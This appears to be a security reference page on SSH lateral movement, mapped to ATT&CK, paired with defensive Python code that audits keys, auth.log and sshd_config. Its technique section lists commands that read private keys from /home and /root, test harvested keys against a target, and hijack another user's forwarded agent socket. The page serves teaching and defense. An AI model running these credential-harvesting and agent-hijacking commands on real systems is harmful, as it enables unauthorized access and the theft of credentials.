SSH Lateral Movement
Overview
SSH (TCP 22) is the primary remote administration protocol on Linux and Unix systems. After harvesting SSH keys, passwords, or Kerberos tickets, lateral movement via SSH provides interactive shell access to additional hosts. SSH keys found on compromised systems often grant access to multiple servers — a single private key can unlock an entire infrastructure.
ATT&CK Mapping
- Tactic: TA0008 - Lateral Movement
- Technique: T1021.004 - Remote Services: SSH
Prerequisites
- SSH credentials (password, private key, or Kerberos ticket)
- Network access to target TCP 22
Techniques
Password Authentication
ssh <user>@<target>
ssh -p <port> <user>@<target>
Key-Based Authentication
# Using a harvested private key
ssh -i /path/to/id_rsa <user>@<target>
# Fix key permissions if needed
chmod 600 /path/to/id_rsa
ssh -i /path/to/id_rsa <user>@<target>
# Test multiple keys (set target to the host under test so the loop and the message agree)
target=<target>
for key in $(find /home/ -name "id_rsa" -o -name "id_ed25519" 2>/dev/null); do
  echo "Testing $key on $target..."
  ssh -i "$key" -o BatchMode=yes -o ConnectTimeout=3 <user>@"$target" 'hostname' 2>/dev/null && echo "SUCCESS: $key"
done
SSH Agent Forwarding Hijacking
If a user has SSH agent forwarding enabled (ssh -A), their agent socket is accessible on the remote host. Any user with access to that socket can use the forwarded keys:
# Find SSH agent sockets
find /tmp -name "agent.*" -type s 2>/dev/null
ls -la /tmp/ssh-*/agent.* 2>/dev/null
# Use another user's agent socket (requires access to the socket)
export SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXX/agent.XXXX
ssh-add -l # List loaded keys
ssh <user>@<next_target> # Use the forwarded key
SSH Key Discovery and Reuse
# Check all user home directories for SSH keys
find /home/ -name "id_rsa" -o -name "id_ed25519" -o -name "id_ecdsa" 2>/dev/null
cat /root/.ssh/id_rsa 2>/dev/null
# Check known_hosts for potential targets
cat ~/.ssh/known_hosts 2>/dev/null
# known_hosts may be hashed — cannot always read hostnames
# Check authorized_keys for clues about other systems
cat ~/.ssh/authorized_keys 2>/dev/null
# Comments may reveal usernames and hostnames: "user@other-server"
# Check SSH config for configured hosts
cat ~/.ssh/config 2>/dev/null
# May reveal hostnames, usernames, and key paths
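The discovery commands above work because keys left on disk without a passphrase are usable as soon as they are read. The defender-side counterpart, which the mitigation list later calls "key passphrase enforcement", is to inventory private keys and flag the ones that carry no passphrase. The following audit is an added example written for this page, not code from the original; it reads the cipher name from the openssh-key-v1 header (the string immediately after the magic) and the RFC 1421 "DEK-Info" header of legacy PEM keys. The sample keys it checks are constructed stubs that carry only the header fields the parser reads and are not usable keys.

```python
from __future__ import annotations

import base64
import struct
from pathlib import Path
from typing import Optional

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def _read_string(blob: bytes, offset: int) -> tuple[bytes, int]:
    """Read one SSH wire-format string: uint32 big-endian length, then bytes."""
    (length,) = struct.unpack(">I", blob[offset:offset + 4])
    start = offset + 4
    return blob[start:start + length], start + length


def key_cipher(text: str) -> Optional[str]:
    """Return the cipher protecting a private key file, "none" when it has no
    passphrase, or None when the text is not a private key we recognise."""
    lines = [ln.strip() for ln in text.strip().splitlines()]
    if not lines or not lines[0].startswith("-----BEGIN "):
        return None
    header = lines[0]
    if header == "-----BEGIN OPENSSH PRIVATE KEY-----":
        # New-style keys: the cipher name is the first string after the magic.
        body = "".join(ln for ln in lines[1:] if not ln.startswith("-----"))
        blob = base64.b64decode(body)
        if not blob.startswith(OPENSSH_MAGIC):
            return None
        cipher, _ = _read_string(blob, len(OPENSSH_MAGIC))
        return cipher.decode("ascii", "replace")
    if "PRIVATE KEY" in header:
        # Legacy PEM keys signal encryption with Proc-Type/DEK-Info headers.
        for ln in lines[1:4]:
            if ln.startswith("DEK-Info:"):
                return ln.split(":", 1)[1].strip().split(",")[0]
        return "none"
    return None


def unprotected_keys(keys: dict[str, str]) -> list[str]:
    """Paths (from a path -> file text mapping) of keys that have no passphrase."""
    return sorted(path for path, text in keys.items() if key_cipher(text) == "none")


def scan_directory(root: Path) -> list[str]:
    """Audit a real tree: every .ssh/id_* private key file without a passphrase."""
    found: dict[str, str] = {}
    for path in root.rglob(".ssh/id_*"):
        if path.is_file() and not path.name.endswith(".pub"):
            try:
                found[str(path)] = path.read_text(errors="replace")
            except OSError:
                continue  # unreadable key files are reported by a different check
    return unprotected_keys(found)


def _openssh_sample(cipher: str, kdf: str) -> str:
    """Build only the header fields key_cipher() reads, base64-wrapped like a
    real file. Constructed for this example; it is not a usable key."""
    def s(b: bytes) -> bytes:
        return struct.pack(">I", len(b)) + b
    blob = OPENSSH_MAGIC + s(cipher.encode()) + s(kdf.encode()) + s(b"") + struct.pack(">I", 1)
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


# Constructed sample inventory: two new-format keys, two legacy PEM keys.
SAMPLE_KEYS = {
    "/home/deploy/.ssh/id_ed25519": _openssh_sample("none", "none"),
    "/home/deploy/.ssh/id_rsa": _openssh_sample("aes256-ctr", "bcrypt"),
    "/home/alice/.ssh/id_rsa": (
        "-----BEGIN RSA PRIVATE KEY-----\n"
        "MIIBCONSTRUCTEDNOTAREALKEY\n"
        "-----END RSA PRIVATE KEY-----\n"
    ),
    "/home/bob/.ssh/id_rsa": (
        "-----BEGIN RSA PRIVATE KEY-----\n"
        "Proc-Type: 4,ENCRYPTED\n"
        "DEK-Info: AES-128-CBC,0123456789ABCDEF0123456789ABCDEF\n"
        "\n"
        "MIIBCONSTRUCTEDNOTAREALKEY\n"
        "-----END RSA PRIVATE KEY-----\n"
    ),
}

if __name__ == "__main__":
    for path in unprotected_keys(SAMPLE_KEYS):
        print(f"no passphrase: {path}")
```

Run it against a real host with `scan_directory(Path("/home"))` as root; the per-path cipher name from `key_cipher()` is also useful evidence when deciding which harvested keys an intruder could have used without cracking anything.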
ProxyJump (SSH Pivoting)
SSH through an intermediate host to reach systems on internal networks:
# ProxyJump (-J flag)
ssh -J <jump_user>@<jump_host> <target_user>@<target>
# Multiple jumps
ssh -J <jump1_user>@<jump1>,<jump2_user>@<jump2> <target_user>@<target>
# ProxyCommand (older method)
ssh -o ProxyCommand="ssh -W %h:%p <jump_user>@<jump_host>" <target_user>@<target>
SSH with Kerberos
# If Kerberos ticket is cached
export KRB5CCNAME=/tmp/krb5cc_target
ssh -o GSSAPIAuthentication=yes <user>@<target>
Detection Methods
Network-Based Detection
- SSH connections from servers that don't normally initiate SSH (servers are usually targets, not sources)
- SSH connections using keys not associated with automation/management accounts
Host-Based Detection
- auth.log entries showing key-based authentication from unexpected sources
- SSH agent socket access by non-owner processes
- New entries in ~/.ssh/authorized_keys (persistence indicator)
- SSH connections at unusual times or from unusual source IPs
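The network- and host-based indicators above reduce to a few rules over sshd's "Accepted ..." lines in auth.log: accepted logins from outside the management network, logins outside business hours, and public-key logins whose fingerprint is not one of the known automation keys. The detector below is an added example written for this page, not code from the original; the log lines, the management network 10.0.1.0/24, the 07:00 to 19:00 business window and the known fingerprint are all constructed assumptions to be replaced with site values.

```python
from __future__ import annotations

import re
from ipaddress import ip_address, ip_network
from typing import Optional

# sshd success lines: "Accepted <method> for <user> from <ip> port <n> ssh2[: <keytype> SHA256:<fp>]"
ACCEPTED_RE = re.compile(
    r"^(?P<mon>[A-Z][a-z]{2})\s+(?P<day>\d{1,2}) (?P<time>\d\d:\d\d:\d\d) (?P<host>\S+) "
    r"sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<src>\S+) port \d+ ssh2"
    r"(?:: (?P<keytype>\S+) (?P<fp>SHA256:\S+))?$"
)

# Assumed site policy (constructed values).
POLICY = {
    "management_networks": [ip_network("10.0.1.0/24")],   # bastion/jump subnet
    "business_hours": range(7, 19),                        # 07:00-18:59 local time
    "known_key_fingerprints": {"SHA256:k0nStrUctEdF1ngErPr1nt"},  # automation keys
}


def parse_accepted(line: str) -> Optional[dict]:
    """Return the fields of a successful-login line, or None for anything else."""
    m = ACCEPTED_RE.match(line)
    return m.groupdict() if m else None


def evaluate(event: dict, policy: dict = POLICY) -> list[str]:
    """Apply the three rules to one parsed event; returns the rules that fired."""
    reasons: list[str] = []
    try:
        src = ip_address(event["src"])
    except ValueError:
        src = None  # hostname or garbage in the source field: treat as unexpected
    if src is None or not any(src in net for net in policy["management_networks"]):
        reasons.append("unexpected_source")
    if int(event["time"][:2]) not in policy["business_hours"]:
        reasons.append("off_hours")
    if event["method"] == "publickey" and event["fp"] not in policy["known_key_fingerprints"]:
        reasons.append("unknown_key")
    return reasons


def scan(lines, policy: dict = POLICY) -> list[tuple[str, str, str, list[str]]]:
    """Run the rules over an iterable of auth.log lines; failures are ignored,
    since the indicators on this page concern successful lateral movement."""
    findings = []
    for line in lines:
        event = parse_accepted(line)
        if event is None:
            continue
        reasons = evaluate(event, policy)
        if reasons:
            findings.append((event["user"], event["src"], event["method"], reasons))
    return findings


# Constructed auth.log excerpt for the example.
SAMPLE_AUTH_LOG = """\
Mar  3 02:14:07 web01 sshd[2231]: Accepted publickey for deploy from 10.0.5.17 port 50122 ssh2: ED25519 SHA256:k0nStrUctEdF1ngErPr1nt
Mar  3 09:30:11 web01 sshd[2410]: Accepted publickey for deploy from 10.0.1.20 port 41002 ssh2: ED25519 SHA256:k0nStrUctEdF1ngErPr1nt
Mar  3 02:15:40 web01 sshd[2290]: Accepted password for alice from 10.0.5.17 port 50200 ssh2
Mar  3 10:01:02 web01 sshd[2500]: Failed password for root from 203.0.113.5 port 2222 ssh2
Mar  3 11:00:00 web01 sshd[2601]: Accepted publickey for bob from 10.0.1.20 port 41100 ssh2: RSA SHA256:Unkn0wnK3yF1ngerpr1nt
""".splitlines()

if __name__ == "__main__":
    for user, src, method, reasons in scan(SAMPLE_AUTH_LOG):
        print(f"{user}@{src} via {method}: {', '.join(reasons)}")
```

The first line is the pattern the page warns about: the deploy key is legitimate, but it was used from a web server at 02:14 rather than from the bastion. A real deployment would feed `scan()` from journald or a log shipper and keep the fingerprint allowlist in sync with whatever issues the automation keys.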
Mitigation Strategies
- Disable agent forwarding — set AllowAgentForwarding no in sshd_config unless specifically needed
- Use SSH certificates — rotate and audit key-based access centrally
- Restrict SSH access — limit which users and source IPs can connect via AllowUsers and firewall rules
- Monitor authorized_keys — alert on changes to authorized_keys files
- Key passphrase enforcement — protect private keys with passphrases
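Three of these mitigations can be checked mechanically: AllowAgentForwarding, an AllowUsers/AllowGroups restriction and a certificate CA (TrustedUserCAKeys) are all global sshd_config keywords, and authorized_keys drift is a set difference against a baseline. The audit below is an added example written for this page, not code from the original or from OpenSSH. It follows sshd's first-value-wins rule for duplicate keywords and deliberately stops at the first Match block, so Match-scoped overrides are out of scope; the weak and hardened config fragments and the authorized_keys contents are constructed samples.

```python
from __future__ import annotations

import shlex


def parse_sshd_config(text: str) -> dict[str, list[str]]:
    """Collect global keywords from sshd_config (lower-cased keyword -> values).
    sshd uses the first value it sees for a keyword, so later duplicates are
    ignored. Parsing stops at the first Match block: this audit only covers
    global settings, and whitespace-separated "keyword value" lines only."""
    settings: dict[str, list[str]] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = shlex.split(line)
        keyword = parts[0].lower()
        if keyword == "match":
            break
        settings.setdefault(keyword, parts[1:])
    return settings


def audit(text: str) -> list[str]:
    """Return one finding per mitigation from this page that the config lacks."""
    cfg = parse_sshd_config(text)
    findings: list[str] = []
    forwarding = (cfg.get("allowagentforwarding") or ["yes"])[0].lower()  # sshd default: yes
    if forwarding != "no":
        findings.append(f"AllowAgentForwarding is {forwarding}; set it to no unless specifically needed")
    if "allowusers" not in cfg and "allowgroups" not in cfg:
        findings.append("no AllowUsers/AllowGroups directive; any account with valid credentials may log in")
    if "trusteduserca keys".replace(" ", "") not in cfg:
        findings.append("no TrustedUserCAKeys; key access is not centrally issued or revocable via certificates")
    return findings


def authorized_keys_changes(baseline: str, current: str) -> dict[str, list[str]]:
    """Diff two authorized_keys files as sets of non-comment entries."""
    def entries(text: str) -> set[str]:
        return {ln.strip() for ln in text.splitlines() if ln.strip() and not ln.startswith("#")}
    before, after = entries(baseline), entries(current)
    return {"added": sorted(after - before), "removed": sorted(before - after)}


# Constructed sample: distribution defaults only.
WEAK_SSHD_CONFIG = """\
Port 22
PermitRootLogin prohibit-password
PasswordAuthentication yes
"""

# Constructed sample: the page's mitigations applied. The second
# AllowAgentForwarding line is ignored by sshd (first value wins), and the
# Match block is outside the scope of this global audit.
HARDENED_SSHD_CONFIG = """\
AllowAgentForwarding no
AllowUsers deploy ops-*
TrustedUserCAKeys /etc/ssh/user_ca.pub
AllowAgentForwarding yes
Match Address 10.0.1.0/24
    AllowAgentForwarding yes
"""

# Constructed authorized_keys snapshots (the key material is not real).
BASELINE_AUTHORIZED_KEYS = "ssh-ed25519 AAAAC3CONSTRUCTED1 deploy@bastion\n"
CURRENT_AUTHORIZED_KEYS = (
    "ssh-ed25519 AAAAC3CONSTRUCTED1 deploy@bastion\n"
    "ssh-rsa AAAAB3CONSTRUCTED2 unknown@laptop\n"
)

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_SSHD_CONFIG), ("hardened", HARDENED_SSHD_CONFIG)):
        print(name, audit(cfg) or ["ok"])
    print(authorized_keys_changes(BASELINE_AUTHORIZED_KEYS, CURRENT_AUTHORIZED_KEYS))
```

Feed `audit()` the output of `sshd -T` rather than the raw file when Match blocks and include directives matter, since `sshd -T` prints the effective global configuration with defaults filled in; the authorized_keys diff is the piece to wire into a file-integrity job so that the "new entries in authorized_keys" indicator from the detection section raises an alert rather than being found after the fact.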